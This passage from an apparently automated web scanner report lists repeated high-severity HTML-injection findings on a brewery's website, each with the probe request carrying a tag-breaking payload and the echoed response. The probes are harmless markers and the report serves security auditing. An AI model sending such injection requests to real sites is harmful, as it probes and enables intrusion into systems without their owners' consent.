GET /content46b3e"><a>f6c375e180b/img/skin/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content46b3e"><a>f6c375e180b_page" class="content46b3e">
...[SNIP]...

1.93. http://www.ninkasibrewing.com/content/img/skin/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e515"><a>56087270b4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content5e515"><a>56087270b4d/img/skin/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content5e515"><a>56087270b4d_page" class="content5e515">
...[SNIP]...

1.94. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7dc2"><a>a7f908ef1e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta7dc2"><a>a7f908ef1e0/img/skin/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta7dc2"><a>a7f908ef1e0_page" class="contenta7dc2">
...[SNIP]...

1.95. http://www.ninkasibrewing.com/content/img/skin/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c044c"><a>596b9b87e27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentc044c"><a>596b9b87e27/img/skin/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentc044c"><a>596b9b87e27_page" class="contentc044c">
...[SNIP]...

1.96. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a84dd"><a>998f8f781b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contenta84dd"><a>998f8f781b2/img/skin/ninkasi-random/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contenta84dd"><a>998f8f781b2_page" class="contenta84dd">
...[SNIP]...

1.97. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aa20"><a>7c1fe0d07f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1aa20"><a>7c1fe0d07f2/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1aa20"><a>7c1fe0d07f2_page" class="content1aa20">
...[SNIP]...

1.98. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aacc"><a>2d12b65e1f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content9aacc"><a>2d12b65e1f4/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:51:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content9aacc"><a>2d12b65e1f4_page" class="content9aacc">
...[SNIP]...

1.99. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff256"><a>504bb81dd8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentff256"><a>504bb81dd8e/img/skin/ninkasi-random/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:51:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentff256"><a>504bb81dd8e_page" class="contentff256">
...[SNIP]...

1.100. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload accc7"><a>cc0bd9440f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentaccc7"><a>cc0bd9440f7/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentaccc7"><a>cc0bd9440f7_page" class="contentaccc7">
...[SNIP]...

1.101. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 590ea"><a>0538fc89295 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content590ea"><a>0538fc89295/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content590ea"><a>0538fc89295_page" class="content590ea">
...[SNIP]...

1.102. http://www.ninkasibrewing.com/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/img/skin/ninkasi-random/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44eb8"><a>507cafa61ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content44eb8"><a>507cafa61ff/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content44eb8"><a>507cafa61ff_page" class="content44eb8">
...[SNIP]...

1.103. http://www.ninkasibrewing.com/content/js/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a306"><a>684cd006b5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content6a306"><a>684cd006b5e/js/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content6a306"><a>684cd006b5e_page" class="content6a306">
...[SNIP]...

1.104. http://www.ninkasibrewing.com/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c9a9"><a>41638d41753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content4c9a9"><a>41638d41753/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content4c9a9"><a>41638d41753_page" class="content4c9a9">
...[SNIP]...

1.105. http://www.ninkasibrewing.com/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab306"><a>4a7c751f450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentab306"><a>4a7c751f450/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentab306"><a>4a7c751f450_page" class="contentab306">
...[SNIP]...

1.106. http://www.ninkasibrewing.com/content/js/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d322"><a>02b1c89f5f6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content1d322"><a>02b1c89f5f6/js/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content1d322"><a>02b1c89f5f6_page" class="content1d322">
...[SNIP]...

1.107. http://www.ninkasibrewing.com/content/js/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f630"><a>d1f857ac5af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content5f630"><a>d1f857ac5af/js/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content5f630"><a>d1f857ac5af_page" class="content5f630">
...[SNIP]...

1.108. http://www.ninkasibrewing.com/content/js/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff1c"><a>27664a239f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /contentcff1c"><a>27664a239f7/js/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="contentcff1c"><a>27664a239f7_page" class="contentcff1c">
...[SNIP]...

1.109. http://www.ninkasibrewing.com/content/js/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21677"><a>0ffcc0b4ab4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /content21677"><a>0ffcc0b4ab4/js/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="content21677"><a>0ffcc0b4ab4_page" class="content21677">
...[SNIP]...

1.110. http://www.ninkasibrewing.com/content/js/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /content/js/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 703df"><a>def2f74c18c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

